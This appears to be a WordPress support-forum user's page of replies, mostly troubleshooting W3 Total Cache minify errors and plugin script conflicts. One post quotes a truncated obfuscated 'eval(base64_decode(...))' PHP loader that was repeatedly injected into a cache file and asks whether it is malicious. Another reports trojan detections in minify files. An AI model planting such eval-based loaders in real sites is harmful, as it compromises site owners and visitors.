lesb55
Forum Replies Created
-
This huge chunk of code keeps getting added to the top of my wp-content/w3tc/min/index.php:
<?php eval(base64_decode(‘ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJv —————Q0K’));?>
<?phpLooks suspect to me, and according to Exploit Scanner; the <?php eval bit can be used to execute malicious code, and the (base64_decode bit can be used by malicious scripts to decode previously obscured data/programs.
Is anybody able to shed some light on this?
Is this normal W3 Total Cache behaviour, and is this code legit?Naa,
tried every possible configuration of minify with this plugin, and all eventually come up with the same error:
“It appears Minify URL rewriting is not working. If using apache, verify that the server configuration allows .htaccess or if using nginx verify all configuration files are included in the configuration.”
When this error is visible my site is of course broken, AND I get the warning from my antivirus (Eset Nod 32) that various Trojans now live on my site (various JS/Iframe.DU/DY trojans in the w3ts/min/a660c/default.include files).
Minify lifts my yslow score from 81 to 90, so I would like to get this working.
Now going to submit a possible bug ticket.
@ haddow777
Thanks for your most kind & detailed suggestions.Spent 2 days now trying to fix this: followed some of your suggestions and the .htaccess code for w3tc in not being changed in any way.
This problem has only surfaced for me with the update to Ver 0.9.2.4Sometimes updates do not ‘take’ properly – I have noticed that w3tc does not delete previous .htaccess and some other files with an update, rather it seems to just append the new ones.
A complete clean reinstall should fix any such problem – but not in this case.Before finally rolling back to the previous version, I did try just one more thing:
I have always used the ‘Manual’ minify mode, as previously this was the only way to exclude some js & css from breaking my site.
‘Auto’ mode is supposed to have been further improved with this latest version, and guess what – it really has been!Doesn’t break my site anymore, speed is just as good, and so far – (fingers crossed) minify is still working.
I’ll report my findings again in a day or so, and if minify is still working in Auto mode; then that certainly smells like a bug to me!
Been using w3tc for a while but after updating to the latest version I started getting:
“It appears Minify URL rewriting is not working. If using apache, verify that the server configuration allows .htaccess or if using nginx verify all configuration files are included in the configuration.”If I deactivate the plugin and then reactivate again – all is fine (for about 6 hours or so) and then the error occurs again.
Have tried all the usual: toggling permalinks, rewriting the .htaccess rules, even completely reinstalled the plugin – but nothing seems to stick.
I have a VPS server with WP installed in my public_html folder. I use APC opcode, but minify IS the one thing that gives me the biggest performance gains.
Might this be a bug in Version 0.9.2.4?Looked at the page in Google Chrome (as you suggest) and found what was causing the partial encrypted error.
My functions.php file now looks like this:add_action( 'wp_print_scripts', 'my_deregister_javascript', 100 ); function my_deregister_javascript() { if ( !is_page('Find a Dealer') ) { wp_deregister_script( 'simplemap-google-api' ); wp_deregister_script( 'simplemap-master-js' ); } }Hurray! fixed the error and simplemap still works OK
Hi Mike,
Forgot to mention I also have this code loaded in my themes functions.php file:
add_action( 'wp_print_scripts', 'my_deregister_javascript', 100 ); function my_deregister_javascript() { if ( !is_page('Find a Dealer') ) { wp_deregister_script( 'simplemap-google-api' ); } }This works fine with Simplemap and WordPress HTTPS V 1.9.2,
but not with V 2.0.2.Thanks for looking into the problem!
Forum: Plugins
In reply to: [HeadSpace2 SEO] Version 3.6.36 print the word 'now' on every pageYep,
For me too – thought something had gone wrong with my theme!
Its on every page but not my product pages.
‘View page source’ also shows it clearly.Forum: Plugins
In reply to: [W3 Total Cache] Can use WP Minify Plugin with W3 Total Cache ?Sure can!
We have been using WP Minify for over a year, and it is one plugin that can really speed up initial load time of your site – especially if you are using other large shopping cart plugins like Shopp.
The minify part of W3 TotalCache does not work nearly as well as WP Minify, so we keep that part switched off in W3TC and are presently just useing the page cache and browser cache functions.
We are still on WP 3.0.1, but should be OK with latest WP 3.0.3 version because both these excellent plugins are always promptly updated.
You can check performance of our website: http:/www.lusanbidets.com.au/